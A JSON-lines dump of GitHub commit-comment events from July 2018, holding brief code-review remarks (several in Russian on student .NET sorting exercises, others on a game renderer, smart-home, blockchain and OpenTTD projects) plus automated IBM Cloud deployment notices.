{"id":"7902646233","type":"CommitCommentEvent","actor":{"login":"Aprogiena"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29556982,"position":19,"line":44,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-01T08:12:12Z","updated_at":"2018-07-01T08:12:12Z","author_association":"COLLABORATOR","body":"and empty line here"}},"created_at":"2018-07-01T08:12:12Z"}
{"id":"7902646495","type":"CommitCommentEvent","actor":{"login":"Aprogiena"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29556983,"position":18,"line":43,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-01T08:12:26Z","updated_at":"2018-07-01T08:12:26Z","author_association":"COLLABORATOR","body":"and empty line after this"}},"created_at":"2018-07-01T08:12:26Z"}
{"id":"7902646965","type":"CommitCommentEvent","actor":{"login":"philipphenkel"},"repo":{"name":"1010Technologies/pxt-makerbit"},"payload":{"comment":{"id":29556984,"position":null,"line":null,"path":null,"commit_id":"65286bf8692bbdd69bd7d98c7246cdff321773a5","created_at":"2018-07-01T08:12:50Z","updated_at":"2018-07-01T08:12:50Z","author_association":"CONTRIBUTOR","body":"Fixed with 8c7ad75a6a64a47944a37b31b0bec3331fda453a"}},"created_at":"2018-07-01T08:12:50Z"}
{"id":"7902647497","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"AntonDr/NET.S.2018.Drachylouski.01"},"payload":{"comment":{"id":29556985,"position":19,"line":19,"path":"MethodsOfSort/MethodsOfSorting.cs","commit_id":"7fe505179ad10935ef2e0842d663ff06ff6f8b98","created_at":"2018-07-01T08:13:19Z","updated_at":"2018-07-01T08:13:19Z","author_association":"NONE","body":"Нет валидации входящих данных (null, length = 0)"}},"created_at":"2018-07-01T08:13:19Z"}
{"id":"7902647952","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"AntonDr/NET.S.2018.Drachylouski.01"},"payload":{"comment":{"id":29556986,"position":30,"line":30,"path":"MethodsOfSort/MethodsOfSorting.cs","commit_id":"7fe505179ad10935ef2e0842d663ff06ff6f8b98","created_at":"2018-07-01T08:13:46Z","updated_at":"2018-07-01T08:13:46Z","author_association":"NONE","body":"private  методы опустить вниз класса"}},"created_at":"2018-07-01T08:13:46Z"}
{"id":"7902648200","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"AntonDr/NET.S.2018.Drachylouski.01"},"payload":{"comment":{"id":29556987,"position":80,"line":80,"path":"MethodsOfSort/MethodsOfSorting.cs","commit_id":"7fe505179ad10935ef2e0842d663ff06ff6f8b98","created_at":"2018-07-01T08:13:59Z","updated_at":"2018-07-01T08:13:59Z","author_association":"NONE","body":"Валидация!"}},"created_at":"2018-07-01T08:13:59Z"}
{"id":"7902648298","type":"CommitCommentEvent","actor":{"login":"wborn"},"repo":{"name":"wborn/smarthome"},"payload":{"comment":{"id":29556988,"position":7,"line":165,"path":"bundles/io/org.eclipse.smarthome.io.net.test/org.eclipse.smarthome.io.net.test.launch","commit_id":"b3e6d642ad07fcaaa56b03222ddcfbd79ad3f37b","created_at":"2018-07-01T08:14:06Z","updated_at":"2018-07-01T08:14:06Z","author_association":"OWNER","body":"It could be! I just added the missing plugins/bundles that Eclipse was complaining about when clicking \"Validate Plug-ins\" in the run configuration. It still complains about java.xml.bind. but it's not causing issues. :smile: "}},"created_at":"2018-07-01T08:14:06Z"}
{"id":"7902648693","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"AntonDr/NET.S.2018.Drachylouski.01"},"payload":{"comment":{"id":29556989,"position":68,"line":68,"path":"MethodsOfSort/MethodsOfSorting.cs","commit_id":"7fe505179ad10935ef2e0842d663ff06ff6f8b98","created_at":"2018-07-01T08:14:26Z","updated_at":"2018-07-01T08:14:26Z","author_association":"NONE","body":"private метод вниз класса"}},"created_at":"2018-07-01T08:14:26Z"}
{"id":"7902648828","type":"CommitCommentEvent","actor":{"login":"fholger"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29556990,"position":94,"line":663,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:14:33Z","updated_at":"2018-07-01T08:14:33Z","author_association":"NONE","body":"Are you sure it is okay to comment this out? From the comments it sounds like a serves a purpose that we don't want to lose."}},"created_at":"2018-07-01T08:14:33Z"}
{"id":"7902649644","type":"CommitCommentEvent","actor":{"login":"Wintiger0222"},"repo":{"name":"Wintiger0222/uth05win"},"payload":{"comment":{"id":29556995,"position":null,"line":null,"path":null,"commit_id":"1131a2e02beec30c01dd1598f9a318e19d3aea29","created_at":"2018-07-01T08:15:18Z","updated_at":"2018-07-01T08:15:18Z","author_association":"OWNER","body":"CxxMidi library should be removed and replace more better."}},"created_at":"2018-07-01T08:15:18Z"}
{"id":"7902649925","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"AntonDr/NET.S.2018.Drachylouski.01"},"payload":{"comment":{"id":29556996,"position":39,"line":39,"path":"SortLibraryTest.cs","commit_id":"8a8225d7aa1873c0a2a7da9fe72638b0143d390d","created_at":"2018-07-01T08:15:33Z","updated_at":"2018-07-01T08:15:33Z","author_association":"NONE","body":"Думаю, что лучше пробежаться по массиву, и удостовериться, что он отсортирован"}},"created_at":"2018-07-01T08:15:33Z"}
{"id":"7902650304","type":"CommitCommentEvent","actor":{"login":"fholger"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29556997,"position":11,"line":71,"path":"game/LightGem.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:15:55Z","updated_at":"2018-07-01T08:15:55Z","author_association":"NONE","body":"Please just remove the previous implementation. It does not make sense to restore individual lines; you'd have to revert this whole commit, anyway. Leaving it in is just unnecessary clutter for any coder to parse when trying to understand the code. :)"}},"created_at":"2018-07-01T08:15:55Z"}
{"id":"7902651430","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.01"},"payload":{"comment":{"id":29556998,"position":19,"line":39,"path":"SortUtilities/Sortings.cs","commit_id":"b54d893e2d1ba24f5f40febdede72e3790ebac0a","created_at":"2018-07-01T08:16:56Z","updated_at":"2018-07-01T08:16:56Z","author_association":"NONE","body":"А зачем здесь буквальные строки? (\"@\")"}},"created_at":"2018-07-01T08:16:56Z"}
{"id":"7902651986","type":"CommitCommentEvent","actor":{"login":"fholger"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29556999,"position":7,"line":576,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:17:22Z","updated_at":"2018-07-01T08:17:22Z","author_association":"NONE","body":"I think this comment isn't really helpful. Pretty soon, no one will even remember it was ever anywhere else. Better to describe what the function is actually doing."}},"created_at":"2018-07-01T08:17:22Z"}
{"id":"7902652087","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.01"},"payload":{"comment":{"id":29557000,"position":24,"line":44,"path":"SortUtilities/Sortings.cs","commit_id":"b54d893e2d1ba24f5f40febdede72e3790ebac0a","created_at":"2018-07-01T08:17:28Z","updated_at":"2018-07-01T08:17:28Z","author_association":"NONE","body":"и здесь?\r\n"}},"created_at":"2018-07-01T08:17:28Z"}
{"id":"7902652634","type":"CommitCommentEvent","actor":{"login":"akirak"},"repo":{"name":"akirak/repom.el"},"payload":{"comment":{"id":29557004,"position":21,"line":21,"path":"helm-repos-github.el","commit_id":"5c815c36c97ad537a9cb58d4039cb0cb6e163807","created_at":"2018-07-01T08:17:58Z","updated_at":"2018-07-01T08:17:58Z","author_association":"OWNER","body":"Thanks. It seems that switching to =helm-source-sync= provided results I want."}},"created_at":"2018-07-01T08:17:58Z"}
{"id":"7902654743","type":"CommitCommentEvent","actor":{"login":"VBart"},"repo":{"name":"nginx/njs"},"payload":{"comment":{"id":29557007,"position":null,"line":null,"path":null,"commit_id":"7cacebeb562e5156987c35ca34a473f4fadd869a","created_at":"2018-07-01T08:19:58Z","updated_at":"2018-07-01T08:19:58Z","author_association":"MEMBER","body":"It's not about checking. It actually requires conversion to number.\r\n```javascript\r\nvar n = [];\r\nn.length = null;\r\nn.length\r\n```\r\nresults `0`"}},"created_at":"2018-07-01T08:19:58Z"}
{"id":"7902655157","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.01"},"payload":{"comment":{"id":29557009,"position":15,"line":15,"path":"SortedClass/SortedClasses.cs","commit_id":"8d4a8b56f5f50a0ccdcb1159f4137be35336869c","created_at":"2018-07-01T08:20:21Z","updated_at":"2018-07-01T08:20:21Z","author_association":"NONE","body":"Методы сортировки не должны возвращать ничего, кроме void"}},"created_at":"2018-07-01T08:20:21Z"}
{"id":"7902655278","type":"CommitCommentEvent","actor":{"login":"lzzy12"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29557010,"position":null,"line":null,"path":null,"commit_id":"771a199147aea8231848e04555a24d659f05b5ee","created_at":"2018-07-01T08:20:27Z","updated_at":"2018-07-01T08:20:27Z","author_association":"OWNER","body":"-_-"}},"created_at":"2018-07-01T08:20:27Z"}
{"id":"7902655573","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.01"},"payload":{"comment":{"id":29557011,"position":19,"line":19,"path":"SortedClass/SortedClasses.cs","commit_id":"8d4a8b56f5f50a0ccdcb1159f4137be35336869c","created_at":"2018-07-01T08:20:42Z","updated_at":"2018-07-01T08:20:42Z","author_association":"NONE","body":"Более информационное сообщение!"}},"created_at":"2018-07-01T08:20:42Z"}
{"id":"7902655687","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.01"},"payload":{"comment":{"id":29557012,"position":24,"line":24,"path":"SortedClass/SortedClasses.cs","commit_id":"8d4a8b56f5f50a0ccdcb1159f4137be35336869c","created_at":"2018-07-01T08:20:50Z","updated_at":"2018-07-01T08:20:50Z","author_association":"NONE","body":"и здесь"}},"created_at":"2018-07-01T08:20:50Z"}
{"id":"7902656030","type":"CommitCommentEvent","actor":{"login":"fholger"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29557016,"position":140,"line":709,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:21:09Z","updated_at":"2018-07-01T08:21:09Z","author_association":"NONE","body":"This is not related to your changes, but I just read through our implementation of RC_COPY_RENDER again, and the way we implemented it, it will always introduce a hard stall because the CPU has to wait for the GPU, even when using PBOs. I'll look into removing the stall, might give us another small but precious time saving in the backend."}},"created_at":"2018-07-01T08:21:09Z"}
{"id":"7902656106","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.01"},"payload":{"comment":{"id":29557017,"position":42,"line":42,"path":"SortedClass/SortedClasses.cs","commit_id":"8d4a8b56f5f50a0ccdcb1159f4137be35336869c","created_at":"2018-07-01T08:21:13Z","updated_at":"2018-07-01T08:21:13Z","author_association":"NONE","body":"Это не часть публичного API"}},"created_at":"2018-07-01T08:21:13Z"}
{"id":"7902656135","type":"CommitCommentEvent","actor":{"login":"wborn"},"repo":{"name":"martinvw/smarthome"},"payload":{"comment":{"id":29557018,"position":43,"line":43,"path":"bundles/io/org.eclipse.smarthome.io.net.test/src/test/java/org/eclipse/smarthome/io/net/http/HttpRequestBuilderTest.java","commit_id":"b44f600b8b2df2a9b5c88f3352f38e4d4fc3116f","created_at":"2018-07-01T08:21:15Z","updated_at":"2018-07-01T08:21:15Z","author_association":"NONE","body":"Forgetting to turn the formatter back on is always the reason why I never turn it off in the first place. :wink: "}},"created_at":"2018-07-01T08:21:15Z"}
{"id":"7902656412","type":"CommitCommentEvent","actor":{"login":"veteran29"},"repo":{"name":"KillahPotatoes/KP-Liberation"},"payload":{"comment":{"id":29557019,"position":null,"line":null,"path":null,"commit_id":"a32ebbbf999ff840f864a2a111ee381a47e58916","created_at":"2018-07-01T08:21:30Z","updated_at":"2018-07-01T08:21:30Z","author_association":"MEMBER","body":"I was aware of this problem but somehow I was also sure that I fixed this issue (seems I have not).\r\n\r\nI think the less code outside of guard code is required for it to work correctly the better, I like this solution.\r\n\r\n"}},"created_at":"2018-07-01T08:21:30Z"}
{"id":"7902664449","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-react"},"payload":{"comment":{"id":29557048,"position":6,"line":28,"path":"react-complete-guide/src/App.js","commit_id":"39b9870112dd418bab1e2461d2344f581d53fd80","created_at":"2018-07-01T08:29:00Z","updated_at":"2018-07-01T08:29:00Z","author_association":"OWNER","body":"And this is the more modern approach.\r\n"}},"created_at":"2018-07-01T08:29:00Z"}
{"id":"7902664491","type":"CommitCommentEvent","actor":{"login":"leouze"},"repo":{"name":"cowbell/cordova-plugin-geofence"},"payload":{"comment":{"id":29557049,"position":null,"line":null,"path":null,"commit_id":"175122b19707df6b0c502c57904133ee216527b4","created_at":"2018-07-01T08:29:03Z","updated_at":"2018-07-01T08:29:03Z","author_association":"NONE","body":"Great @ElieSauveterre I'll be adding it on my watchlist.\r\nMy current project that uses this is currently on hold. \r\nThanks for the update."}},"created_at":"2018-07-01T08:29:03Z"}
{"id":"7902664692","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"MaxArt1405/ASP.NET-Training"},"payload":{"comment":{"id":29557050,"position":null,"line":null,"path":null,"commit_id":"153fda2dd02cfbdac1635d6bdafffc339fbbe67c","created_at":"2018-07-01T08:29:14Z","updated_at":"2018-07-01T08:29:14Z","author_association":"NONE","body":"В целом все выглядит очень хорошо, только переименуйте файл, содержащий тестовый класс (UnitTest1 -  это плохо )"}},"created_at":"2018-07-01T08:29:14Z"}
{"id":"7902667431","type":"CommitCommentEvent","actor":{"login":"Kerrung"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29557056,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-01T08:31:34Z","updated_at":"2018-07-01T08:31:34Z","author_association":"NONE","body":">these xaudio patches cause the compile to fail during the 64 bit build with error that avcodec.h can not be found.\r\n\r\n@SteveEbey73742 but, for example, it works fine for me... What am I doing wrong?"}},"created_at":"2018-07-01T08:31:34Z"}
{"id":"7902668688","type":"CommitCommentEvent","actor":{"login":"wborn"},"repo":{"name":"martinvw/smarthome"},"payload":{"comment":{"id":29557058,"position":43,"line":43,"path":"bundles/io/org.eclipse.smarthome.io.net.test/src/test/java/org/eclipse/smarthome/io/net/http/HttpRequestBuilderTest.java","commit_id":"b44f600b8b2df2a9b5c88f3352f38e4d4fc3116f","created_at":"2018-07-01T08:32:46Z","updated_at":"2018-07-01T08:32:46Z","author_association":"NONE","body":"Maybe they added support in Photon? That would be a good reason alone for everyone to upgrade! "}},"created_at":"2018-07-01T08:32:46Z"}
{"id":"7902668804","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29557062,"position":12,"line":12,"path":"NET.S.2018.Lavrenov.01/IntegerExtenshion/MergeSort.cs","commit_id":"f69b3db0ced35da706884b7c6c164bc10ac8396e","created_at":"2018-07-01T08:32:52Z","updated_at":"2018-07-01T08:32:52Z","author_association":"NONE","body":"Сортировки, по-прежнему, в разных классах!"}},"created_at":"2018-07-01T08:32:52Z"}
{"id":"7902669481","type":"CommitCommentEvent","actor":{"login":"PCORTINA"},"repo":{"name":"PCORTINA/sample-cloud-native-toolchain-tutorial-20180629135832828"},"payload":{"comment":{"id":29557063,"position":null,"line":null,"path":null,"commit_id":"45d8e48b52f7a677f24b5e5b8b1244427fe71cda","created_at":"2018-07-01T08:33:28Z","updated_at":"2018-07-01T08:33:28Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/e49039fa-0d6a-4a42-83ca-bf06f016180e?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180629135832828\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/514a6b20-e043-4908-a015-5cc6932215f6?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180629135832828\") deployed [sample-cloud-native-toolchain-tutorial-20180629135832828](https://github.com/PCORTINA/sample-cloud-native-toolchain-tutorial-20180629135832828/releases/tag/deploy-ibm-yp-eu-gb-paula_cortina-es.ibm.com-test-20180701-083322 \"deploy-ibm-yp-eu-gb-paula_cortina-es.ibm.com-test-20180701-083322\") to [test](https://console.bluemix.net/apps/bf7c99ee-2606-4a0a-aaa4-aeb951bbff54?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:paula_cortina@es.ibm.com:test\"), including this commit"}},"created_at":"2018-07-01T08:33:28Z"}
{"id":"7902669539","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29557064,"position":32,"line":32,"path":"NET.S.2018.Lavrenov.01/IntegerExtenshion/MergeSort.cs","commit_id":"f69b3db0ced35da706884b7c6c164bc10ac8396e","created_at":"2018-07-01T08:33:31Z","updated_at":"2018-07-01T08:33:31Z","author_association":"NONE","body":"Этот метод переместить в тестовый класс, и не помечать как тестовый, пометить как приватный"}},"created_at":"2018-07-01T08:33:31Z"}
{"id":"7902669754","type":"CommitCommentEvent","actor":{"login":"yanishoss"},"repo":{"name":"yanishoss/weather"},"payload":{"comment":{"id":29557065,"position":null,"line":null,"path":null,"commit_id":"8cb1c7087eade3c7fb1d37dc8296fc74c0d6f7f4","created_at":"2018-07-01T08:33:43Z","updated_at":"2018-07-01T08:33:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Finished the common API](https://trello.com/c/2yQJonXU/19-finished-the-common-api)"}},"created_at":"2018-07-01T08:33:43Z"}
{"id":"7902669900","type":"CommitCommentEvent","actor":{"login":"duzenko"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29557066,"position":94,"line":663,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:33:51Z","updated_at":"2018-07-01T08:33:51Z","author_association":"OWNER","body":"There is a compiler error about partial class or something. I couldn't understand it. Could you take a look?"}},"created_at":"2018-07-01T08:33:51Z"}
{"id":"7902670322","type":"CommitCommentEvent","actor":{"login":"YannickDieter"},"repo":{"name":"SiLab-Bonn/pytlu"},"payload":{"comment":{"id":29557067,"position":null,"line":null,"path":null,"commit_id":"8a70aca56f6821f78c62bd312223004e00e508cd","created_at":"2018-07-01T08:34:16Z","updated_at":"2018-07-01T08:34:16Z","author_association":"CONTRIBUTOR","body":"Thank you, but still the online_monitor install requirement was missing. I added this, but the pipeline still fails since `utils/reset_gen.v` is missing. "}},"created_at":"2018-07-01T08:34:16Z"}
{"id":"7902670419","type":"CommitCommentEvent","actor":{"login":"lzzy12"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29557068,"position":null,"line":null,"path":null,"commit_id":"771a199147aea8231848e04555a24d659f05b5ee","created_at":"2018-07-01T08:34:21Z","updated_at":"2018-07-01T08:34:21Z","author_association":"OWNER","body":"NoU"}},"created_at":"2018-07-01T08:34:21Z"}
{"id":"7902670892","type":"CommitCommentEvent","actor":{"login":"fholger"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29557069,"position":44,"line":613,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:34:48Z","updated_at":"2018-07-01T08:34:48Z","author_association":"NONE","body":"Let's perhaps get rid of the m_ prefix here. It's potentially confusing, because it sounds like it's a member variable, which it's not."}},"created_at":"2018-07-01T08:34:48Z"}
{"id":"7902670931","type":"CommitCommentEvent","actor":{"login":"duzenko"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29557070,"position":140,"line":709,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:34:52Z","updated_at":"2018-07-01T08:34:52Z","author_association":"OWNER","body":"Good."}},"created_at":"2018-07-01T08:34:52Z"}
{"id":"7902671223","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29557071,"position":36,"line":36,"path":"NET.S.2018.Lavrenov.01/IntegerExtenshion/MergeSort.cs","commit_id":"f69b3db0ced35da706884b7c6c164bc10ac8396e","created_at":"2018-07-01T08:35:10Z","updated_at":"2018-07-01T08:35:10Z","author_association":"NONE","body":"Лконичнее перевернуть условие и заменить continue на break"}},"created_at":"2018-07-01T08:35:10Z"}
{"id":"7902671659","type":"CommitCommentEvent","actor":{"login":"duzenko"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29557073,"position":160,"line":851,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:35:32Z","updated_at":"2018-07-01T08:35:32Z","author_association":"OWNER","body":"Totally agree. Needs to be the first subview in the backend run, not the last."}},"created_at":"2018-07-01T08:35:32Z"}
{"id":"7902671826","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29557074,"position":61,"line":61,"path":"NET.S.2018.Lavrenov.01/IntegerExtenshion/MergeSort.cs","commit_id":"f69b3db0ced35da706884b7c6c164bc10ac8396e","created_at":"2018-07-01T08:35:40Z","updated_at":"2018-07-01T08:35:40Z","author_association":"NONE","body":"Более информационные сообщение"}},"created_at":"2018-07-01T08:35:40Z"}
{"id":"7902672431","type":"CommitCommentEvent","actor":{"login":"StefanAngelov1"},"repo":{"name":"noia-network/noia-node-gui"},"payload":{"comment":{"id":29557076,"position":null,"line":null,"path":null,"commit_id":"24b0d30e94ff3e7d317ca3572316386c1beadb28","created_at":"2018-07-01T08:36:13Z","updated_at":"2018-07-01T08:36:13Z","author_association":"NONE","body":"Helki"}},"created_at":"2018-07-01T08:36:13Z"}
{"id":"7902672710","type":"CommitCommentEvent","actor":{"login":"DNK90"},"repo":{"name":"smconnect/kardia-py"},"payload":{"comment":{"id":29557077,"position":8,"line":8,"path":"src/blockchain/db/tx_db.py","commit_id":"b0642227027f3b44df4c839f90539e1422e5691f","created_at":"2018-07-01T08:36:27Z","updated_at":"2018-07-01T08:36:27Z","author_association":"CONTRIBUTOR","body":"1- it should be `super(TxDB, self).__init__('./db/tx')`\r\n2- the path should not be fixed like this"}},"created_at":"2018-07-01T08:36:27Z"}
{"id":"7902672947","type":"CommitCommentEvent","actor":{"login":"StefanAngelov1"},"repo":{"name":"noia-network/noia-node-gui"},"payload":{"comment":{"id":29557078,"position":null,"line":null,"path":null,"commit_id":"24b0d30e94ff3e7d317ca3572316386c1beadb28","created_at":"2018-07-01T08:36:39Z","updated_at":"2018-07-01T08:36:39Z","author_association":"NONE","body":"Hello"}},"created_at":"2018-07-01T08:36:39Z"}
{"id":"7902673445","type":"CommitCommentEvent","actor":{"login":"PCORTINA"},"repo":{"name":"PCORTINA/sample-cloud-native-toolchain-tutorial-20180629135832828"},"payload":{"comment":{"id":29557080,"position":null,"line":null,"path":null,"commit_id":"45d8e48b52f7a677f24b5e5b8b1244427fe71cda","created_at":"2018-07-01T08:37:08Z","updated_at":"2018-07-01T08:37:08Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/e49039fa-0d6a-4a42-83ca-bf06f016180e?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180629135832828\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/514a6b20-e043-4908-a015-5cc6932215f6?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180629135832828\") deployed [sample-cloud-native-toolchain-tutorial-20180629135832828](https://github.com/PCORTINA/sample-cloud-native-toolchain-tutorial-20180629135832828/releases/tag/deploy-ibm-yp-eu-gb-paula_cortina-es.ibm.com-prod-20180701-083706 \"deploy-ibm-yp-eu-gb-paula_cortina-es.ibm.com-prod-20180701-083706\") to [prod](https://console.bluemix.net/apps/f09414d1-b3e9-4162-b2f2-5dc7f312a700?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:paula_cortina@es.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-01T08:37:08Z"}
{"id":"7902673597","type":"CommitCommentEvent","actor":{"login":"DNK90"},"repo":{"name":"smconnect/kardia-py"},"payload":{"comment":{"id":29557081,"position":14,"line":14,"path":"src/blockchain/db/tx_db.py","commit_id":"b0642227027f3b44df4c839f90539e1422e5691f","created_at":"2018-07-01T08:37:15Z","updated_at":"2018-07-01T08:37:15Z","author_association":"CONTRIBUTOR","body":"same as above. It should be `super(TxDB, self).put(...)`"}},"created_at":"2018-07-01T08:37:15Z"}
{"id":"7902673792","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29557082,"position":null,"line":null,"path":null,"commit_id":"45a9fcecc3d374e7f46d1d0da5383aa78b1d1ccc","created_at":"2018-07-01T08:37:26Z","updated_at":"2018-07-01T08:37:26Z","author_association":"NONE","body":"Сольюшен комитить не нужно"}},"created_at":"2018-07-01T08:37:26Z"}
{"id":"7902674631","type":"CommitCommentEvent","actor":{"login":"planetmaker"},"repo":{"name":"OpenTTD/OpenTTD"},"payload":{"comment":{"id":29557088,"position":null,"line":null,"path":null,"commit_id":"0c37b0445adb8dd6f3acda1bea89b170b16bdc06","created_at":"2018-07-01T08:38:15Z","updated_at":"2018-07-01T08:38:15Z","author_association":"NONE","body":"I think that works for now.\r\n\r\nYet I think we will - also in the future - need a way to increase the NewGRF version in order to support checking for features. So maybe we would want some global constant definition in a slightly more obvious place which could be used for this?"}},"created_at":"2018-07-01T08:38:15Z"}
{"id":"7902674759","type":"CommitCommentEvent","actor":{"login":"fholger"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29557090,"position":94,"line":663,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:38:22Z","updated_at":"2018-07-01T08:38:22Z","author_association":"NONE","body":"Will do."}},"created_at":"2018-07-01T08:38:22Z"}
{"id":"7902675206","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29557091,"position":5,"line":25,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-01T08:38:47Z","updated_at":"2018-07-01T08:38:47Z","author_association":"NONE","body":"Я не согласна, что появился ref, зачем?"}},"created_at":"2018-07-01T08:38:47Z"}
{"id":"7902676028","type":"CommitCommentEvent","actor":{"login":"duzenko"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29557094,"position":44,"line":613,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:39:34Z","updated_at":"2018-07-01T08:39:34Z","author_association":"OWNER","body":"Do we still want to leave all this stuff public? I don't have a problem with it, but I am no C++ expert. Is it \"best practice\" or at least \"good enough\"?"}},"created_at":"2018-07-01T08:39:34Z"}
{"id":"7902676773","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29557095,"position":11,"line":27,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-01T08:40:16Z","updated_at":"2018-07-01T08:40:16Z","author_association":"NONE","body":"Условие if (start < end) плохо, поскольку, если оно не выполняется, то непонятно, что не валидные данные."}},"created_at":"2018-07-01T08:40:16Z"}
{"id":"7902676861","type":"CommitCommentEvent","actor":{"login":"Teklad"},"repo":{"name":"bluuman/jwaim"},"payload":{"comment":{"id":29557096,"position":9,"line":16,"path":"README.md","commit_id":"d7873dbcfddf62299d8b67a3741068bedb1e19ea","created_at":"2018-07-01T08:40:20Z","updated_at":"2018-07-01T08:40:20Z","author_association":"COLLABORATOR","body":"Yep.... I'll change that."}},"created_at":"2018-07-01T08:40:20Z"}
